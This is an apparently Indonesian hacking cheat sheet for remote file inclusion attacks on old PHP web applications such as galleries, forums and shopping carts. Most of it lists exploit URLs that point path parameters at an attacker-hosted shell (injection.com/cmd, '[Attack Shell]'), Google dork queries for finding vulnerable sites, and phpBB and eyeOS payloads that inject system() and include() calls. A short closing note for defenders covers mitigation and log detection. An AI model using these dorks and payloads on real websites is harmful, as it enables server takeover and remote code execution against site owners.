http://makemenutt.com/cc.txt Exploit :- # # http://[target]/[path]/addfav.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-admlog.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-approve.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-backup.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-cats.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-cinc.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-db.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-editcfg.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-inc.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-index.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-modcom.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-move.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-options.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-order.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-pa.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-photo.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-purge.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-style.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-templ.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-userg.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-users.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/bulkupload.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/cookies.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/comments.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/ecard.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/editphoto.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/register.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/showgallery.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/showmembers.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/useralbums.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/uploadphoto.php?PP_PATH=[Attack Shell]? 
# http://[target]/[path]/search.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-menu.php?PP_PATH=[Attack Shell]? ================================================================== Untuk forum : allinurl:my_egallery site:.org allinurl:xgallery site:.org allinurl:coppermine site:.org allinurl:4nAlbum site:.org allinurl:PNphpBB2 site:.org allinurl:ihm.php?p= allinurl:.php?bodyfile= allinurl:/default.php?page=home allinurl:/folder.php?id= allinurl:main.php?pagina= allinurl:/modules.php?name=allmyguests allinurl:AshNews atau allinurl: /ashnews.php allinurl:ihm.php?p=* allinurl:kietu/hit_js.php allinurl:/Popper/index.php? keyword : "Powered by phpBB 2.0.6" keyword : "powered by CubeCart 3.0.6" keyword : "powered by paBugs 2.0 Beta 3" Keyword : "powered by AllMyLinks" keyword : /phorum/login.php keyword : "powered eyeOs" allinurl:/includes/orderSuccess.inc.php?glob= allinurl:modules.php?name=Forums Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword. Kalo memang rajin coba liat ajah listnya di : -= http://www.geocities.com/k4k3_rgb/list.txt =- 4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com atau kalau kamu tidak berhasil coba dengan list berikut : Ganti modul : 1. my_egallery: /modules/My_eGallery/public/displayCategory.php?basepath= 2. xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= 3. coppermine: /modules/coppermine/themes/default/theme.php?THEME_DIR 4. 4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath= 5. PNphpBB2 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= 6. AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= 7. /Popper/index.php? : /Popper/index.php?childwindow.inc.php?form= 8. kietu : kietu/index.php?kietu[url_hit]= 9. "Powered by phpBB 2.0.6" : &highlight=%2527.include($_GET[a]),exit.%2527&a= 10. "powered by CubeCart 3.0.6" : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= 11. 
"powered by paBugs 2.0 Beta 3" : /class.mysql.php?path_to_bt_dir= 12. "powered by AllMyLinks" : /include/footer.inc.php?_AMLconfig[cfg_serverpath]= 13. /phorum/login.php : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= 14. "powered eyeOs" : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id diganti dengan : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a= 15. /includes/orderSuccess.inc.php?glob : http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= 16 allinurl:modules.php?name=Forums : /modules.php?name= ============================================================================= http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd? 
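http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.injection.com/cmd?

Note for defenders: almost every request listed on this page has the same shape. A path-like variable (PP_PATH, basepath, GALLERY_BASEDIR, phpbb_root_path, config[path_src_include], ...) is set from the query string to an http:// URL, and the value ends in "?". This is the remote file inclusion pattern. It presumably depends on the script passing that variable to include/require without initialising it first (the scripts themselves are not shown here), and on PHP being allowed to include remote URLs. The two phpBB and eyeOS entries differ: there the parameter value carries PHP code (include(...), system(...)) instead of a URL. Mitigation: keep allow_url_include=Off, run a PHP version without register_globals (removed in PHP 5.4), define include base paths as constants in a bootstrap file rather than reading them from variables, and deny direct web access to *.inc.php and admin include files. Detection: search web-server access logs for query-string values that begin with http://, https:// or ftp:// (raw or URL-encoded) and end in "?", and for the parameter names above appearing in requests at all, since legitimate clients have no reason to send them.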